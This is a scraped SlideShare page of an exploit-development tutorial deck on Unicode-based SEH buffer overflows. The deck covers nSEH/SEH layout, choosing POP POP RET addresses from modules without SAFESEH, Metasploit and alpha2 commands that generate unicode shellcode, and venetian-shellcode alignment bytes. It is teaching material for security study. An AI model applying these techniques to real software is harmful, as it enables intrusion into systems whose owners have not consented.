0
@ajinabraham
ASCII UNICODE CHART
@ajinabraham
•
•
•
@ajinabraham
•
•
@ajinabraham
@ajinabraham
@ajinabraham
nSEH
•JMP TO SHELLCODE
(xebx06x90x90)
SEH
•POP,POP,RET SEQUENCE
Shellcode
•SHELLCODE
EIP
1
2
3
@ajinabraham
•
nSEH
•JMP TO SHELLCODE
We can’t use actual JMP. We will walk to shellcode
We will use single byte instructi...
@ajinabraham
•
•
• JMP TO SHELLCODE
We can’t use actual JMP. We will walk to shellcode
We will use single byte instruction...
@ajinabraham
SEH
•POP,POP,RET SEQUENCE (The address will be of the format
0x00aa00bb)
Selecting Suitable Address
• The Add...
@ajinabraham
• Generate the shellcode with Metasploit alone or use SkyLined’s alpha2 encoder.
msfpayload windows/exec CMD=...
@ajinabraham
•
@ajinabraham
• You will need to properly align the set of instructions with venetian shellcode so that it won’t
break at e...
@ajinabraham
•
•
•
•
• https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unic
ode-from-0x0041004...
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Upcoming SlideShare
Loading in...5
×

Exploit Research and Development Megaprimer: Unicode Based Exploit Development

1,075

Published on

Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/

http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf

Published in: Education, Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,075
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
89
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Exploit Research and Development Megaprimer: Unicode Based Exploit Development"

  1. 1. @ajinabraham ASCII UNICODE CHART
  2. 2. @ajinabraham • • •
  3. 3. @ajinabraham • •
  4. 4. @ajinabraham
  5. 5. @ajinabraham
  6. 6. @ajinabraham nSEH •JMP TO SHELLCODE (xebx06x90x90) SEH •POP,POP,RET SEQUENCE Shellcode •SHELLCODE EIP 1 2 3
  7. 7. @ajinabraham • nSEH •JMP TO SHELLCODE We can’t use actual JMP. We will walk to shellcode We will use single byte instructions along with some NOP like harmless aligning instructions(Venetian Shellcode). SEH •POP,POP,RET SEQUENCE (The address will be of the format 0x00aa00bb) Shellcode •UNICODE SHELLCODE (Shellcode is Decoder + Shellcode. So we have to point a register to the decoder and jump to it. We use venetian shellcode technique for alignment.) EIP 1 2 3
  8. 8. @ajinabraham • • • JMP TO SHELLCODE We can’t use actual JMP. We will walk to shellcode We will use single byte instructions along with some NOP like harmless aligning instructions(Venetian Shellcode). nSEH You need to try out and choose the working one. But you can check it only after you check SEH popad/inc eax or selecting the nops Example “x61x41” implies 61 ->POPAD 004100 ->ADD BYTE PTR DS:[ECX],AL “x41x71” implies 41 ->INC ECX 007100 ->ADD BYTE PTR DS:[ECX],DH 1Byte Instruction 41 : INC ECX 61 POPAD
  9. 9. @ajinabraham SEH •POP,POP,RET SEQUENCE (The address will be of the format 0x00aa00bb) Selecting Suitable Address • The Address range should be between 0x00 and 0x7f • Choose address from modules without SAFESEH • Address should be in the format 0x00aa00bb • Say if you choose “0x004d0041” then specify “x41x4d”(little endian) in the shellcode. • “00” will be prepended by the program during execution. • Even if we get suitable addresses, all of these don’t work. You have to try out each address to find out the address that doesn’t harm the execution flow and reaches at our shellcode. !mona seh –cp unicode Suitable Address 0x004b00cb 0x004a0041 0x004a0059 0x004d0041 0x004100f2 0x004c0020
  10. 10. @ajinabraham • Generate the shellcode with Metasploit alone or use SkyLined’s alpha2 encoder. msfpayload windows/exec CMD=calc R | msfencode -e x86/unicode_upper BufferRegister=EAX -t raw msfpayload windows/exec CMD=calc R | ./alpha2 eax –unicode –uppercase • We need to point a register to contain our shellcode and jump to it. For alignment we use venetian shellcode technique. • We will use EAX to contain our shellcode. Shellcode UNICODE SHELLCODE (Shellcode is Decoder + Shellcode. So we have to point a register to the decoder and jump to it. We use venetian shellcode technique for alignment.) Shellcode Shellcode Decoder
  11. 11. @ajinabraham •
  12. 12. @ajinabraham • You will need to properly align the set of instructions with venetian shellcode so that it won’t break at execution time. • You should be creative. You should analyze the execution flow in the debugger. • At times we need to add extra venetian shellcode at the beginning and end to properly align everything. • So for example the previous code after adding some venetian shellcode may look like this. "x58“ pop eax # take the value of ebp and pop it to eax "x71“ # Venetian Padding "x05xbbxaa" add eax,0xaa00bb00 # "x71" # Venetian Padding > Add and Subtract,(0xaa00bb00 >0xcc00dd00) will give you a positive value X, and will be added to EAX in effect. "x2dxddxcc" sub eax,0xcc00dd00 # / "x71" # Venetian Padding "x50" push eax # push the new value of EAX in stack "x71" # Venetian Padding "xC3" ret # Return the address of shellcode in EAX to EIP for execution • Add sufficient NOP like instruction to reach our shellcode. • MSF Pattern can be used but better just tryout yourself manually.
  13. 13. @ajinabraham • • • • • https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unic ode-from-0x00410041-to-calc • http://www.fuzzysecurity.com/tutorials/expDev/5.html • http://net-ninja.net/article/2010/May/29/unicode-the-magic-of-exploiting-0x00410041/
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×